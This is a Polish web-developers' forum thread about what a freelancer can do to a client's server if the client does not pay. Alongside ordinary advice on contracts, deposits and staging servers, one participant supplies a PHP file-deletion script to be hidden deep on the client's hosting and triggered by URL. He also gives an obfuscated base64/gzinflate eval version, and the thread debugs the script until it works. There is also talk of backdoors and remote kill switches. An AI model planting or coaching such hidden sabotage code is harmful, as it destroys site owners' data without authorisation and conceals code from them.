Jak Sie Zabezpieczyc Pracujac Na Serwerze Klienta?

[szybki_bil 0]

Czesto robie strony internetowe dla klientow, daja mi dostep ftp do serwera i czasami dostep do cpanelu lub directadmina.

 

Moze mi sie zdarzyc ze po wykonanej pracy lub w trakcie nagle nie bede mial zadnego dostepu czyli ktos mnie "wydyma".

Narazie dmucham na zimne ale slysze ze koledzy maja takie przypadki.

 

Jak sie zabezpieczyc tzn, miec chocby dostep do ftp.

Z tego co sie orientowalem to mam takie mozliwosci:

- pozostawic skrypt, ktory potem odpale i skasuje moje pliki (Tylko że wszystko można potem odtworzyć z backupu)

- Częsc kodu pobierana jest z mojego serwera za pomoca polecenia include, w przypadku oszustwa zmieniam index i pojawia sie np info "strona zablokowana z powodu nie wywiazania sie z umowy"

- backdoor, doorway ( nie wiem co to dokladnie)

- skasowanie bazy danych za pomoca skryptu

 

Macie jakies doswiadczenia lub pomocne info?

Bylbym bardzo wdzieczny za opisanie tych metod.

Pozdrawiam

[Gość patrick]

Brać zaliczke będąca połową wynagrodzenia, i skrypt tez mozesz zostawic ktory skasuje pliki, a na dodatek stworzy nowy ktory bedzie informowal...

[Kamil_Matysik 0]

Najlepiej nie zgadzać się na takie warunki. Zawsze jak wykonuje jakieś większe zlecenie wszystko instaluje na swoim serwerze a po zatwierdzeniu przenoszę na serwer klienta. Zdecydowanie bezpieczniejszy układ.

 

Poza tym umowa.

 

Pozdr

Kamil

[ednet 136]

Ja ZAWSZE wersje robocze umieszczam na miom serwerze a klient ma dostep tylko przez przegladarkę.

Potem następuje platnosc za usluge i strona www jest instalowana na serwerze klienta.

 

Jesli jednak musisz instalowac na serwerze klienta to tylko po skompilowaniu mmturckiem lub eaceleratorem z nalozonym limitem czasu.

 

Za duzo jest cwaniaków wśród klientów....

 

ed

[beliq 442]

Ja wsród znajomych webmasterów nie znam nikogo,

kto by oddawał projekt w ręce klienta nim cała należność za usługę nie znalazła się na jego koncie bankowym.

Nim to nie nastąpi,

klient może podziwiać dzieło tylko na serwerze roboczym mając do niego dostęp tylko via www.

Proste i bezpieczne rozwiązanie.

[Tomi 0]

Ja oddaje projekt w całości ale mam umowę w kieszeni i fakturę wysyłam. Poza tym kolega opracował klucz licencyjny, a Cms np. nie udostępniamy wcale zawsze jest na naszym serwerze. Od dawna stosujemy usługę kompleksową, czyli strona razem z hostingiem, firmy nic nie obchodzi i ja mam spokój. Klienta zazwyczaj widzę na oczy wielokrotnie. Dzisiaj klienci czekają w kolejce wiec można im delikatnie dyktować warunki.

[szybki_bil 0]

Ktos ma mnie wydymac to i umowa nie pomorze.

Strone musze instalowac na serwerez klienta bo chodzi o to zeby bylo inne IP.

Wiec wlasny serwer odpada.

 

Ciesze sie ze odpisaliscie i macie jakies pomysly, do tej pory na kazdym forum odpisywali amatorzy bez konkretow.

 

Jest jeszcze taka sprawa ze mam tam jeden plik php, ktory zawiera login i haslo do admina strony, ktorym jestem ja. Moze da sie ten plik zabezpieczyc przed zmianą hasla?

 

Podoba mi sie pomysl ednet

Mozesz wyjasnic to szczegolowiej?

 

Zalezaloby mi na tym zebym mogl skasowac z serwera wlasna grafike, sa to dokladnie 4 pliki jpg i gif.

Albo przeniesc plik dostepowy do admina na moj serwer tylko nie wiem jak to technicznie wykonac.

 

Dzieki za wszystkie odpowiedzi!

[ednet 136]

Podoba mi sie pomysl ednet

Mozesz wyjasnic to szczegolowiej?

 

mam na mysli kompilowanie skrtyptow php do postaci binarnej.

sluzy do tego http://sourceforge.net/projects/turck-mmcache . Nadaje się on do starszych wersji PHP 4.x

 

Do nowszych wersji jest jego nastepca kontynuowany przez innych programistów http://eaccelerator.net/ .

 

Komercyjny zamiennik IonCube: http://phpencoder.pl/

Mozliwosci: http://phpencoder.pl/offer.php (mozliwosci pozostalych są podobne)

Wada tych rozwiązań jest to że serwer musi miec to zainstalowane lub pozwalac na uruchomienie loadera za pomocą funkcji dl().

 

Przeważnie serwery mają wgrany jakiś kompilator jednak nie ma regoly jaki.

Największy ISP jaki jest home.pl ma tylko dla php 4.x mmturck. Nie ma mozliwosci zainstalowania ioncuba, nie dziala funkcja dl(). Dostalem informację ze byc moze w przyszlosci bedzie eaccelerator.

 

Najbardziej rokuje http://eaccelerator.net/ i mozna miec nadzieje ze za kilka miesiecy stanie się on standartem na serwerach jak tylko będzie całekiem stabilny na php5.1x.

 

Firmom hostingowym powinno rowniez zalezec na instalowaniu takiego typu softu bo zmniejsza to zuzycie serwa.

 

 

ed

[Tomi 0]

Przcież hasła zapisuje sie zazwyczaj w md5() po co przechowywać czyste hasło jak można przechować zmieszany wynik. Kasowanie plików jest banalne.

 

Mały EDIT:

Wstawiasz na serwer plik: zly_klient.php a w nim

<?php
$plik1 = '/sciezka/do/pliku/plik1.jpg';
$plik2 = '/sciezka2/do/pliku/plik2.gif';

if (file_exists("$plik1")) // sprawdza czy plik1 jest na serwerze
			{
		  chmod("$plik1", 0777);
		  @unlink("$plik1"); /* to bedzie wywalało plik1 jeśli ma on odpowiednie prawa do zapisu czyli 666 */
			}
if (file_exists("$plik2")) // sprawdza czy plik2 jest na serwerze
			{
		  chmod("$plik2", 0777);
		  @unlink("$plik2"); /* to bedzie wywalało plik2 jeśli ma on odpowiednie prawa do zapisu czyli 666 */
			}
?>

 

Wstawiasz to na konto klienta gdzieś gełboko co by to nie wiedział gdzie i odpalasz http://domena.pl/jalkas/glaboka/sciezka/do.../zly_klient.php

 

Możesz też to zakodować prostą metodą

 

<? eval(gzinflate(base64_decode('
rZLRSsMwFIbvB3uHnyFsHbK4XLQX3axvIrFJt7Nm
TWha4iI+leDz2VqZc+IQNBe5OHycfHwku11ldmvH
oyurqVxijSlzOalQCiYN64ft+71c7Oxmmn6A/BTk
X0m+2FDRk+MRukMFZgVpda8eyTVuNhlemkQRGIOz
tfAyCOThgEFhp1yDSsCp2qs6qGHN6Xk6H+XbvZHH
zde4SZIkSs+pu7bSVJWfBinYHI3Bg5KBFPzBCy1e
zNHjVRP2AqaCkdZ4UrLqsN5YQBoEYcm1vXnHxXGM
Ofvu+nypAv+pAv9rBf7LCvxyBf5/FbLup70B
'))); ?>

 

to jest to samo co wyżej sam koder możesz użyć na http://www.du-artemedia.com/87encoder.php albo odpalić sobie na localhoscie co polecam. Polecam metodę PHP - Trecherous Strength - Compressed ja zastosowałem pierwszą żeby nie rozwalić tematu na forum

[szybki_bil 0]

Wpisalem tak:

 

 

<?php
$plik1 = '/index.php';
$plik2 = '/sciezka2/do/pliku/plik2.gif';

if (file_exists("$plik1")) // sprawdza czy plik1 jest na serwerze
			{
		  @unlink("$plik1"); /* to bedzie wywalało plik1 jeśli ma on odpowiednie prawa do zapisu czyli 666 */
			}
if (file_exists("$plik2")) // sprawdza czy plik2 jest na serwerze
			{
		  @unlink("$plik2"); /* to bedzie wywalało plik2 jeśli ma on odpowiednie prawa do zapisu czyli 666 */
			}
}
?>

Wlaczylem adres i:

 

Parse error: syntax error, unexpected '}' in sciezka/zly.php on line 13

 

Co zle zrobilem?

[Tomi 0]

Już poprawiłem (zedytwoałem swój kod), pisałem z palca wiec to moja wina, wywal ostatni znak }

 

Dodałem automatyczne zmienienie chmoda. nie zapomnij nadac też chmod 666 na plik: zly_klient.php możesz to zrobić za pomocą total commandera

[szybki_bil 0]

Kurde dalej nie dziala, po wlaczeniu skryptu pojawia sie pusta strona, plikow nie wykasowalo.

Probowalem kilka razy z roznymi ustawieniami atrybutow i kilkoma plikami.

 

 

Zrobilem wg nowych instrukcji, z auto chmodem wylazi blad:

Warning: chmod() [function.chmod]: Operation not permitted in /home/mieszkan/public_html/katalog/zly.php on line 7

[Tomi 0]

A dałeś chmod 666 na plik zly.php ? zaraz odpale u siebie i zobacze co sie dzieje

 

wywal slashe na początku mogą czasmi przeszkadzać.:

 

$plik1 = 'index.php';

$plik2 = 'sciezka2/do/pliku/plik2.gif';

 

i sprawa ważniejsza katalog w którym zmieniasz chmod musi mieć prawa chmod 777

[szybki_bil 0]

Jasne ze tak.

 

Moze wyprobuj gdzies u siebie czy dziala?

 

OK czekam

[Tomi 0]

No wiec tak:

 

Pliki graficzne mogą mieć normalny chmod np 644 czyli nic nie zmieniasz:

Katalog w którym się znajdują powinien mieć 777

a plik którym wykonujesz np: zły.php powiniemn mieć 666

 

0 - na poczatku jest potrzebne tylko w sktypcie php czyli chmod("$plik2", 0777); w totalcommanderze to samo znaczy 777

 

Skrypt działa poprawnie, przetestowałem

[szybki_bil 0]

Cudnie, dziala!

 

Dzieki wielkie za pomoc.

 

 

Jezeli dostaje dostep do subdomeny to nie widze katalogu glownego w takim razie nie moge usunac plikow?

[ednet 136]

to rozwiązanie z kasowaniem plikow ma dwie wady:

1. nieraz php dziala z prawami np nobody i nie wykonasz chmoda lub unlinka.

2. taki klient po usunieciu bardzo latwo odzyska je z kopii.

 

ed

[szybki_bil 0]

W wiekszosci przypadkow powinno byc to skuteczne.

chmoda moge zrobic sam wiec skrypt nie musi.

 

Jeszcze zostaje ten jeden plik z haslem do admina, co z min zrobic zebym tylko ja mial tam dostep?

 

 

Pozdrawiam

 

 

ednet jak sie uchronic przed tym co piszesz w punkcie 2?

Bo kurde raz zadzialalo ale wiecej nie chce:/

[ednet 136]

ednet jak sie uchronic przed tym co piszesz w punkcie 2?

Bo kurde raz zadzialalo ale wiecej nie chce:/

 

Mam na mysli kopię na serwerze. Większośż firm hostingowych ma wykonuje kopie bezpieczenstwa. PO usunieciu taki klient wysle majla do oblugi z proźbą o odzyskanie danych. PO kilku minutach moze miec znowy dzialający system.

 

Srednio bystry klient przed awanturą o brak płatnosci samemu zgra sobie wszystko przez ftpa na swoj komputer i tez ma wlasną kopię.

 

ed

[szybki_bil 0]

Czyli nie ma dobrej skutecznej metody...

Ta wyzej opisywana przez Ciebie jest skomplikowana.

 

Jeszcz sie zastanawiam nad przeniesieniem pliku dostepu do admina na swoj serwer.

Ale nie wiem czy to zadziala, trzeba by bylo zmienic zamiast

include "config.php" sciezke dostepu do serwera tak?

[ednet 136]

Czyli nie ma dobrej skutecznej metody...

Ta wyzej opisywana przez Ciebie jest skomplikowana.

 

kompilowanie skryptow moze nie jest łatwe (uzaleznienie od zainstalowanego oprogramowania) ale za to 100% skuteczne.

 

Jeszcz sie zastanawiam nad przeniesieniem pliku dostepu do admina na swoj serwer.

Ale nie wiem czy to zadziala, trzeba by bylo zmienic zamiast

include "config.php" sciezke dostepu do serwera tak?

 

nie mozna includowac pliku php z innego serwera.

 

 

ed

[ertcap 0]

nie mozna includowac pliku php z innego serwera.

Teoretycznie sie da Ale troche to bez sensu bo to nic nie da w ramach zabezpieczenia konta

 

Generalnie polecam kompilacje skryptow. To w 99% daje gwarancje bezpieczenstwa.

 

pzdr.

[szybki_bil 0]

Z tym includowaniem chodzi mi o to zebym mial na swoim serwerze plik dostepu do admina, tam mozna duzo rzeczy pozmieniac wiec byloby to skuteczne.

Czyli wystarczy zamiast pliku php wpisac sciezke na serwer?

 

Teraz bierzemy sie za kompilacje skryptow.

 

Powiedzcie z jakimi problemami bede mogl sie spotkac.

Pierwsze chyba trzeba wyczaic jakim programem to mozna zrobic?

[ednet 136]

Z tym includowaniem chodzi mi o to zebym mial na swoim serwerze plik dostepu do admina, tam mozna duzo rzeczy pozmieniac wiec byloby to skuteczne.

Czyli wystarczy zamiast pliku php wpisac sciezke na serwer?

 

Teraz bierzemy sie za kompilacje skryptow.

 

Powiedzcie z jakimi problemami bede mogl sie spotkac.

Pierwsze chyba trzeba wyczaic jakim programem to mozna zrobic?

 

wyzej Ci napisalem jakimi programami trzeba kompilować skrypty.

 

ed

[Tomi 0]

Jeśli miałbyć odpowiednie umiejetności mógłbyć sie zabezpieczyć za pomoca pobierania pliku z twojego serwera i sprawdzania jego wartości jeśli była by nieprawidłowa strona nie dzaiałał by poprawnie. Taki plik może być w formacie xml albo txt z jakąś zakodowaną wrtością (kluczem) który porównywał byś z drugim kluczem u klienta i to by wystarczyło. Ale myśle ze nie masz takiej wiedzy i tego sam nie wykonasz. Z tego co widzę to nie piszesz niczego w php wiec ... niestety.